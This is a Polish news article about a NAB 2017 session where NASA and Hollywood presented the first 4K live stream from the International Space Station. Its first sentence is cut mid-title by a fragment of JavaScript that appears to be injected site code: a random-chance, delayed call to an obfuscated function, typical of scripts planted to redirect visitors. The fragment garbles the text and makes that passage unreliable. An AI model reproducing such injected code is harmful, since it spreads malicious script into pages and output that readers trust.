W czasie tegorocznej edycji NAB 2017 odbyła się nadzwyczajna sesja pt.: Reaching for the Stars: Connecting to the Future with NASA andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Hollywood, podczas której dokonano pierwszego w historii streamingu w rozdzielczości 4K ze stacji kosmicznej.  Dzięki technologii UHD nawiązano połączenie z dowódcą Ekspedycji 51 – astronautką Peggy Whitson.

Zobacz film

Wspomnieć należy, że amerykańska agencja kosmiczna jest pionierem w wykorzystywaniu nowoczesnych rozwiązań. Zastosowanie rozdzielczości o 4-krotnie wyższej wartości niż dotychczasowa technologia HD, zwiększa możliwości obserwacyjne i odkrywcze NASA, co z pewnością będzie przekładać się na wzrost wiedzy o ziemi i kosmosie.

W konwersacji wzięli udział m.in.: astronautka NASA Tracy Caldwell Dyson, manager programu NASA Rodney Grubbs, Bernadette McDaid – kierownik rozwoju w firmie Bau Entertainment oraz Khawaja Shams zastępca kierownika Działu Technicznego firmy Elemental, która to dostarczyła enkoder do realizacji transmisji.

Rozważania dotyczyły kwestii, w jaki sposób zaawansowane obrazowanie i technologie chmury podnoszą poziom badań naukowych i przemysłu filmowego.  Uczestnicy konferencji mogli więc dowiedzieć się, w jaki sposób technologia 4K/Ultra HD pomagają naukowcom z NASA, jak została zrealizowana potężna, pierwsza w historii transmisja na żywo w rozdzielczości 4K, przeprowadzona z wykorzystaniem chmury pracującej w przestrzeni kosmicznej oraz  w jaki sposób Hollywood i NASA inspirują się wzajemnie i jak fascynujące są efekty tej długoletniej współpracy.